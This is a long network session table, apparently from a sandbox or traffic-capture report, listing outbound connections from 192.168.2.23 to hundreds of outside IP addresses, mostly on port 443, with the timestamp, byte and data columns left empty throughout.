                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22131192.168.2.235430037.190.126.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22132192.168.2.2353910125.98.63.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22133192.168.2.2343854107.143.202.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22134192.168.2.2340044172.0.83.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22135192.168.2.2342796173.97.119.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22136192.168.2.233360638.252.33.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22137192.168.2.2344002133.25.0.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22138192.168.2.2359788155.176.10.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22139192.168.2.235672238.18.96.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22140192.168.2.2345752182.75.222.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22141192.168.2.2348764189.12.0.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22142192.168.2.234002480.60.207.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22143192.168.2.23357802.98.123.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22144192.168.2.233616451.97.92.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22145192.168.2.2358580216.142.200.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22146192.168.2.2340218191.96.179.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22147192.168.2.235301659.164.93.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22148192.168.2.2358346195.122.142.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22149192.168.2.235219643.204.101.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22150192.168.2.2354100122.141.23.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22151192.168.2.2353152129.227.9.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22152192.168.2.2360266122.82.7.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22153192.168.2.2350624154.189.233.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22154192.168.2.236018454.219.80.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22155192.168.2.235743481.213.53.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22156192.168.2.2351790164.35.123.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22157192.168.2.2345950207.45.173.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22158192.168.2.233514436.3.217.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22159192.168.2.2358212153.110.198.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22160192.168.2.2354172107.184.133.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22161192.168.2.234870467.114.105.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22162192.168.2.234956631.136.124.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22163192.168.2.234952497.49.208.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22164192.168.2.2354780183.132.187.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22165192.168.2.236077073.196.225.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22166192.168.2.2358098172.223.119.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22167192.168.2.235011641.10.107.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22168192.168.2.2352020157.88.85.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22169192.168.2.234601654.232.47.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22170192.168.2.2349124207.209.59.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22171192.168.2.2349592110.109.79.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22172192.168.2.234976238.214.206.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22173192.168.2.2333990143.209.44.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22174192.168.2.2336362171.54.192.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22175192.168.2.233961486.22.41.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22176192.168.2.2334730219.163.226.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22177192.168.2.2358606121.28.147.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22178192.168.2.2346792100.1.129.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22179192.168.2.2334150181.24.252.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22180192.168.2.2357528115.92.198.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22181192.168.2.2333498192.171.245.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22182192.168.2.2343078220.1.97.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22183192.168.2.235475496.20.225.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22184192.168.2.235914880.53.82.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22185192.168.2.2357878222.3.149.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22186192.168.2.2358086120.16.177.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22187192.168.2.2355428221.100.239.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22188192.168.2.2345938202.48.150.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22189192.168.2.235929463.151.80.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22190192.168.2.2333394191.179.39.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22191192.168.2.234963043.4.94.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192192.168.2.235161092.45.40.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22193192.168.2.2334214131.10.97.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22194192.168.2.2357192201.168.141.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22195192.168.2.2337720174.169.124.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22196192.168.2.233656046.210.129.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22197192.168.2.2352208141.245.17.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22198192.168.2.235142299.146.91.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22199192.168.2.2356654198.244.66.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22200192.168.2.23398028.203.194.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22201192.168.2.234463239.89.45.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22202192.168.2.236014674.138.112.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22203192.168.2.2336140154.177.137.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22204192.168.2.2345654156.146.223.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22205192.168.2.2339658190.173.146.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22206192.168.2.235330670.79.45.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22207192.168.2.234611065.60.140.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22208192.168.2.233393020.150.137.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22209192.168.2.2343972135.188.103.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22210192.168.2.233539685.121.86.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22211192.168.2.233926465.33.85.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22212192.168.2.235755298.35.127.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22213192.168.2.2337458186.4.57.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22214192.168.2.235026420.147.245.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22215192.168.2.235050681.221.127.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22216192.168.2.233936618.120.154.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22217192.168.2.233589254.171.15.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22218192.168.2.234668852.250.230.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22219192.168.2.235364624.63.87.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22220192.168.2.2356946202.50.172.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22221192.168.2.233455693.252.229.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22222192.168.2.2353934175.75.235.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22223192.168.2.233304248.25.80.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22224192.168.2.2354104176.68.176.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22225192.168.2.233675468.52.149.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22226192.168.2.235605425.55.238.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22227192.168.2.235700083.189.128.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22228192.168.2.23349668.98.135.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22229192.168.2.2359986169.66.205.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22230192.168.2.233890427.142.136.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22231192.168.2.2341598166.210.208.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22232192.168.2.2354878192.246.222.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22233192.168.2.2336694169.2.153.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22234192.168.2.234036687.177.181.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22235192.168.2.2334290169.194.250.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22236192.168.2.23434801.211.25.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22237192.168.2.233907092.88.225.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22238192.168.2.235532471.238.117.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22239192.168.2.2358972206.241.210.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22240192.168.2.2343244175.85.224.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22241192.168.2.2357214168.218.180.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22242192.168.2.235514413.245.155.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22243192.168.2.2350450118.96.152.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22244192.168.2.235968484.64.161.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22245192.168.2.2349964191.73.92.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22246192.168.2.2352152206.150.26.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22247192.168.2.2335694181.38.27.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22248192.168.2.2350896149.93.174.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22249192.168.2.2346208120.24.20.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22250192.168.2.233385665.132.98.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22251192.168.2.235622266.63.174.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22252192.168.2.2344352167.64.11.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22253192.168.2.235630683.217.98.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22254192.168.2.2349332116.18.171.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22255192.168.2.2358862158.152.31.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22256192.168.2.235846696.109.161.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22257192.168.2.235867472.250.35.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22258192.168.2.2334156180.153.191.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22259192.168.2.2346122101.118.206.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22260192.168.2.235099863.1.182.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22261192.168.2.2343594198.132.151.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22262192.168.2.2353944194.247.61.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22263192.168.2.235504093.251.187.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22264192.168.2.235255265.14.102.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22265192.168.2.233383044.175.192.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22266192.168.2.2357732182.35.108.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22267192.168.2.234113479.80.145.1828080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22268192.168.2.233518495.86.74.2138080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22269192.168.2.2342020142.88.160.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22270192.168.2.2349118137.84.153.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22271192.168.2.2359382122.69.255.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22272192.168.2.234639464.236.161.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22273192.168.2.2339588107.25.106.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22274192.168.2.233366275.254.167.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22275192.168.2.2334366211.136.172.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22276192.168.2.235549489.166.67.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22277192.168.2.233521442.230.253.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22278192.168.2.2339836213.194.31.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22279192.168.2.2339124167.168.73.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22280192.168.2.2356060179.173.96.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22281192.168.2.2344018188.119.68.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22282192.168.2.235235218.150.114.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22283192.168.2.2334062185.49.97.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22284192.168.2.234107866.239.79.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22285192.168.2.2347468161.28.177.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22286192.168.2.235627241.98.63.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22287192.168.2.233662063.214.222.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22288192.168.2.2356970199.83.227.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22289192.168.2.234860084.203.199.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22290192.168.2.234453260.221.72.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22291192.168.2.2332958104.139.14.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22292192.168.2.234203688.234.149.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22293192.168.2.2335782151.164.175.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22294192.168.2.234499297.43.176.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22295192.168.2.2346066125.174.87.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22296192.168.2.2343846192.67.10.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22297192.168.2.234384092.164.95.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22298192.168.2.236027625.83.245.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22299192.168.2.234541048.193.108.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22300192.168.2.234128687.62.141.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22301192.168.2.2341200122.13.84.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22302192.168.2.2354936179.157.172.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22303192.168.2.234627888.93.32.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22304192.168.2.233961227.41.205.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22305192.168.2.2356336104.62.10.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22306192.168.2.23521141.64.84.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22307192.168.2.2356028197.169.117.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22308192.168.2.2360920180.73.255.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22309192.168.2.2349200136.150.149.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22310192.168.2.234693640.113.144.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22311192.168.2.235528489.57.62.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22312192.168.2.23411848.55.0.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22313192.168.2.236009218.113.186.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22314192.168.2.2336628191.187.102.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22315192.168.2.23376085.250.95.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22316192.168.2.2357592121.179.117.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22317192.168.2.235856689.204.240.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22318192.168.2.235371690.149.105.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22319192.168.2.2338270175.223.46.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22320192.168.2.2338268148.152.90.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22321192.168.2.2357028213.235.167.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22322192.168.2.2336220184.173.176.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22323192.168.2.2356966158.232.125.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22324192.168.2.233437459.168.93.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22325192.168.2.2334768221.73.29.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22326192.168.2.2333098204.107.174.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22327192.168.2.2360136160.217.232.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22328192.168.2.2357486108.141.131.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22329192.168.2.2335454149.247.65.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22330192.168.2.2357020154.18.65.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22331192.168.2.236041290.35.92.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22332192.168.2.235370464.75.8.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22333192.168.2.2334112177.244.93.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22334192.168.2.2359562179.104.164.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22335192.168.2.2352814220.230.151.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22336192.168.2.2342598113.169.124.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22337192.168.2.234065289.6.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22338192.168.2.235188036.90.118.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22339192.168.2.2341146167.140.55.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22340192.168.2.2335842162.187.127.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22341192.168.2.235685675.137.101.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22342192.168.2.2351312140.135.0.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22343192.168.2.2338038203.155.34.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22344192.168.2.233600692.64.134.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22345192.168.2.236031698.23.95.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22346192.168.2.2348586223.157.129.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22347192.168.2.2347144158.148.70.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22348192.168.2.2355330106.65.67.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22349192.168.2.2350326188.128.244.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22350192.168.2.2351822125.6.4.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22351192.168.2.235005623.12.189.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22352192.168.2.234739280.33.234.122443
                                                TimestampBytes transferredDirectionData


